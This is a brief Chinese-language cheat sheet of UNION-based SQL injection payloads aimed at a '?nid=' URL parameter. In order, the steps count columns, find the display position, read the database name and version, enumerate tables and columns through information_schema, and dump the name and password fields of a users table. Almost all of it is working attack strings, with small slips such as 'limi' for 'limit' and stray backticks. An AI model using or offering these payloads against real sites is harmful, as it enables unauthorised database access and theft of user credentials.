判断列数
?nid=1 order by 1 --+`
?nid=1 order by 1 --+ 错误程序中SQL语句有两列
判断显示位
?nid=0 union select 1`
数据库名字
?nid=0 union select database()
数据库版本
?nid=0 union select version()
列表名
?nid=0 union select table_name from information_schema.tables where table_schema=database() 列表明
?nid=0 union select group_concat(table_name) from information_schema.tables where table_schema=database() 使用group_concat 拼接字符串显示内容
?nid=0 union select table_name from information_schema.tables where table_schema=database() limi 0,1
?nid=0 union select table_name from information_schema.tables where table_schema=database() limi 1,1 使用limit按次序查询表名
列users表中字段
?nid=0 union select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()
列字段内容
?nid=0 union select group_concat(name) from users
?nid=0 union select group_concat(pass) from users 